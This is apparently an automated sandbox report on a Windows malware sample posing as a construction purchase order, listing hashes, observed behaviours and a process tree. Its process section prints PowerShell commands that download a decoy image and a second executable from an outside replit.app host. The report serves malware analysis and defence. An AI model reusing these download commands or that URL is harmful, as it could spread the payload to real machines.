Analysis

max time kernel: 117s
max time network: 127s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 29-07-2024 07:13
Static task
static1

Behavioral task
behavioral1
Sample: jdconstructnOrderfdp..exe
Resource: win7-20240704-en

Behavioral task
behavioral2
Sample: jdconstructnOrderfdp..exe
Resource: win10v2004-20240709-en
General

Target: jdconstructnOrderfdp..exe
Size: 288KB
MD5: 7e900eb50f9dc1cb5c68ffea4b9e7bcc
SHA1: 4dcc14dc2b98fbc171308fb55b5b8551dd96ea96
SHA256: 8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3
SHA512: a77aeffc4f80358940e40789a67f67df5adc1bde4790a400665a98871498b10c3206981d3f18efa1149c9ec246f0343d133dd77de4f5a1f5816506a204276b1a
SSDEEP: 3072:6q6+ouCpk2mpcWJ0r+QNTBfRuk1qXkXRA4XTZK:6ldk1cWQRNTBpd8t
Malware Config
Signatures

Command and Scripting Interpreter: PowerShell
Processes:
  pid    process
  2748   powershell.exe
  2640   powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
  description   ioc                                                           process
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   jdconstructnOrderfdp..exe

Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
  pid    process
  2748   powershell.exe
  2640   powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
  description               pid    process
  Token: SeDebugPrivilege   2748   powershell.exe
  Token: SeDebugPrivilege   2640   powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs
Processes:
  description                        pid    process                     target process
  PID 2708 wrote to memory of 2872   2708   jdconstructnOrderfdp..exe   cmd.exe          (4 IoCs)
  PID 2872 wrote to memory of 2748   2872   cmd.exe                     powershell.exe   (3 IoCs)
  PID 2872 wrote to memory of 2640   2872   cmd.exe                     powershell.exe   (3 IoCs)
Processes

Process: C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe
Command line: "C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID: 2708

    Process: C:\Windows\system32\cmd.exe
    Command line: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8298.tmp\8299.tmp\829A.bat C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"
    - Suspicious use of WriteProcessMemory
    PID: 2872

        Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 2748

        Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/networkrunfdp.exe' -OutFile networkrunfdp.exe"
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 2640
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 334B
MD5: 9aaac0122442ca0ebb4d8bb795e86676
SHA1: 594744d8e4d51273dd435c3fac5799bc5f180e8c
SHA256: 6af7e75e339241dac26eca99aa1290c1f420b45b4231212d20adf08aa287e373
SHA512: d08a0dd3b40d80c7582c3f69a7868371e7eb03ac6f4658a39e7a9fb1dd34cc22a5e91d60b31af71c77cebfe0fd0c3827fdbb3cc35224189388345c61e756636c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize: 7KB
MD5: cb03fc5057bb504c410d7dfc9340cec0
SHA1: 688aa6bf36b4f06bee011d9cfe74e90b8e671b1e
SHA256: 184994eef087e2619c0725840ca43212800b62b32774d2a5be254986e36dd7f7
SHA512: d897eb6a3dfc04f9fa29b7e7e3f73f191d9ee70d74a299de95a4c27a723c94aef3c41cc795b1c52108bfb73c92ecc8e72d36f56c07b510c35923d6081de77641